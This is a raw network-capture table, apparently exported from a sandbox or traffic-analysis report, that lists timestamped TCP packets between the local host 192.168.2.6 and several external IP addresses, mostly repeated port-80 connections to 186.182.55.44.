                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.085011959 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.086967945 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.107537031 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.183670044 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.254013062 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.327625990 CET49729443192.168.2.6217.160.255.217
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.327721119 CET44349729217.160.255.217192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.327933073 CET49729443192.168.2.6217.160.255.217
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.354212999 CET49729443192.168.2.6217.160.255.217
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.354232073 CET44349729217.160.255.217192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.739130974 CET4973080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.970850945 CET804973091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.971024036 CET4973080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.981486082 CET4973110198192.168.2.6185.220.101.198
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.996897936 CET4973080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.996946096 CET4973080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.176160097 CET1019849731185.220.101.198192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.228491068 CET804973091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.228507042 CET804973091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.246674061 CET804973091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.308661938 CET4973080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.465749979 CET4973080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.683737040 CET4973110198192.168.2.6185.220.101.198
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.878581047 CET1019849731185.220.101.198192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:02.480524063 CET4973110198192.168.2.6185.220.101.198
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:02.677710056 CET1019849731185.220.101.198192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:02.997559071 CET49733443192.168.2.645.66.33.45
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:02.997612000 CET4434973345.66.33.45192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:02.997761965 CET49733443192.168.2.645.66.33.45
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.000052929 CET49733443192.168.2.645.66.33.45
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.000066996 CET4434973345.66.33.45192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.183623075 CET4973110198192.168.2.6185.220.101.198
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.379683018 CET1019849731185.220.101.198192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.574908018 CET4434973345.66.33.45192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.575095892 CET49733443192.168.2.645.66.33.45
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.587814093 CET49733443192.168.2.645.66.33.45
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.587824106 CET4434973345.66.33.45192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.588819027 CET4434973345.66.33.45192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.589267015 CET49733443192.168.2.645.66.33.45
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.633254051 CET4434973345.66.33.45192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:03.980578899 CET4973110198192.168.2.6185.220.101.198
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:04.175267935 CET1019849731185.220.101.198192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.110997915 CET4974180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.384177923 CET8049741186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.384310961 CET4974180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.384588957 CET4974180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.384641886 CET4974180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.658123970 CET8049741186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.305275917 CET8049741186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.305632114 CET8049741186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.305702925 CET4974180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.306749105 CET4974180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.478986025 CET4974280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.579037905 CET8049741186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.766737938 CET8049742186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.766899109 CET4974280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.898032904 CET4974280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.898092031 CET4974280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:31.185584068 CET8049742186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.141650915 CET8049742186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.141670942 CET8049742186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.141762972 CET4974280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.542567015 CET4974280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.751859903 CET4974380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.830224037 CET8049742186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.039328098 CET8049743186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.047142982 CET4974380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.047669888 CET4974380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.047770977 CET4974380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.336224079 CET8049743186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.987519026 CET8049743186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.987539053 CET8049743186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.987595081 CET4974380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.987682104 CET4974380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.991478920 CET4974480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.263144016 CET8049744186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.263277054 CET4974480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.275331974 CET4974480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.275376081 CET4974480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.276289940 CET8049743186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.548556089 CET8049744186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.512032986 CET8049744186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.512586117 CET8049744186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.512700081 CET4974480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.513151884 CET4974480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.518456936 CET4974580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.787338018 CET8049744186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.789653063 CET8049745186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.789853096 CET4974580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.790131092 CET4974580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.790131092 CET4974580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.062578917 CET8049745186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.709964991 CET8049745186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.710153103 CET4974580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.710495949 CET8049745186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.710599899 CET4974580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.713784933 CET4974680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.981504917 CET8049745186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.987404108 CET8049746186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.987555027 CET4974680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.987979889 CET4974680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.988039970 CET4974680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.260698080 CET8049746186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.910686970 CET8049746186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.910707951 CET8049746186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.910836935 CET4974680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.910931110 CET4974680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.916992903 CET4974780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.184168100 CET8049746186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.200153112 CET8049747186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.200267076 CET4974780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.200635910 CET4974780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.200686932 CET4974780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.484635115 CET8049747186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.127890110 CET8049747186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.127954960 CET8049747186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.128150940 CET4974780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.128232002 CET4974780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.134063959 CET4974880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.404962063 CET8049748186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.405109882 CET4974880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.405524015 CET4974880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.405559063 CET4974880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.412281990 CET8049747186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.677397966 CET8049748186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.326931000 CET8049748186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.326945066 CET8049748186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.327124119 CET4974880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.332380056 CET4974880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.344274044 CET4974980192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.604516029 CET8049748186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.628494024 CET8049749186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.628864050 CET4974980192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.630462885 CET4974980192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.630532026 CET4974980192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.917224884 CET8049749186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:41.872435093 CET8049749186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:41.872452021 CET8049749186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:41.872581005 CET4974980192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:41.882936001 CET4974980192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:41.887510061 CET4975080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.168477058 CET8049749186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.172276974 CET8049750186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.172635078 CET4975080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.172760963 CET4975080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.172856092 CET4975080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.457683086 CET8049750186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.102771997 CET8049750186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.103032112 CET4975080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.103331089 CET8049750186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.103527069 CET4975080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.113981962 CET4975180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.153582096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.159718037 CET4975280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.379087925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.379200935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.386262894 CET8049751186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.386363983 CET4975180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.387450933 CET8049750186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.432012081 CET8049752186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.432136059 CET4975280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.432393074 CET4975280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.432425976 CET4975280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.705271959 CET8049752186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.357743979 CET8049752186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.357773066 CET8049752186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.357886076 CET4975280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.357914925 CET4975280192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.362514973 CET4975380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.630189896 CET8049752186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.634635925 CET8049753186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.634742975 CET4975380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.635087013 CET4975380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.635142088 CET4975380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.908355951 CET8049753186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.561587095 CET8049753186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.561626911 CET8049753186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.561687946 CET4975380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.561760902 CET4975380192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.565951109 CET4975480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.837459087 CET8049753186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.856189966 CET8049754186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.856296062 CET4975480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.864173889 CET4975480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.864274025 CET4975480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:46.153146982 CET8049754186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.113061905 CET8049754186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.113248110 CET4975480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.113559008 CET8049754186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.113641024 CET4975480192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.117825985 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.409086943 CET8049754186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:48.105576038 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:49.647803068 CET8049755186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:49.648065090 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:50.328068972 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:50.328236103 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:50.617758989 CET8049755186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.577183962 CET8049755186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.577347994 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.577682018 CET8049755186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.577728033 CET4975580192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.582257986 CET4975680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.854221106 CET8049756186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.854412079 CET4975680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.855417967 CET4975680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.855755091 CET4975680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.866189957 CET8049755186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.127670050 CET8049756186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.776684046 CET8049756186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.776699066 CET8049756186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.776747942 CET4975680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.776848078 CET4975680192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.790304899 CET4975780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.054692984 CET8049756186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.081182003 CET8049757186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.081337929 CET4975780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.082417965 CET4975780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.082622051 CET4975780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.369833946 CET8049757186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.330399036 CET8049757186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.330410957 CET8049757186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.330528975 CET4975780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.330977917 CET4975780192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.335135937 CET4975880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.606061935 CET8049758186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.606232882 CET4975880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.606475115 CET4975880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.606498957 CET4975880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.618103981 CET8049757186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.878827095 CET8049758186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.528109074 CET8049758186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.528122902 CET8049758186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.528306961 CET4975880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.528659105 CET4975880192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.533298969 CET4976080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.800677061 CET8049758186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.804795980 CET8049760186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.805193901 CET4976080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.805500984 CET4976080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.805540085 CET4976080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.077704906 CET8049760186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.731765032 CET8049760186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.731888056 CET8049760186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.731976032 CET4976080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.737808943 CET4976080192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.756659985 CET4976180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.010129929 CET8049760186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.041261911 CET8049761186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.041361094 CET4976180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.041739941 CET4976180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.041795969 CET4976180192.168.2.6186.182.55.44
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.329456091 CET8049761186.182.55.44192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.975321054 CET8049761186.182.55.44192.168.2.6
